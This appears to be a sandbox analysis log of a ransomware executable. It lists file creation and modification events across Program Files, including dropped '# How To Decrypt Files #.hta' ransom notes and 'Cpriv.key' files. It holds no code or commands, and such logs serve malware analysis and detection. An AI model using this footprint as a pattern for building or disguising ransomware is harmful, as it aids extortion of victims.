de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\main.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\DOCS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\README.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00212_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Earthy.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENVELOPE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\macroprogress.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0291984.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103812.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\da\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00760L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02054_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\LAUNCH.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATALOG.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EquityMergeLetter.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232797.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_07.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05870_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\DEEPBLUE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ENGLISH.LNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\te\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\en-GB.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02141_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ORIG98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02958_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\Publisher\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Network Sharing\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Slipstream.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR18F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02261_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB02229_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\swiftshader\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086424.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Casual.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePage.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\server\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FRENCH.LNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_pressed.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OneNote\SendToOneNoteNames.gpd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR24F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Stationery\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Priority.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00390_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExpenseReport.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\or\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00256_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-compat.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedQuanPin.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\BTINTERNET.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107280.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\az\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\gu.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00336_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\# How To Decrypt Files #.hta 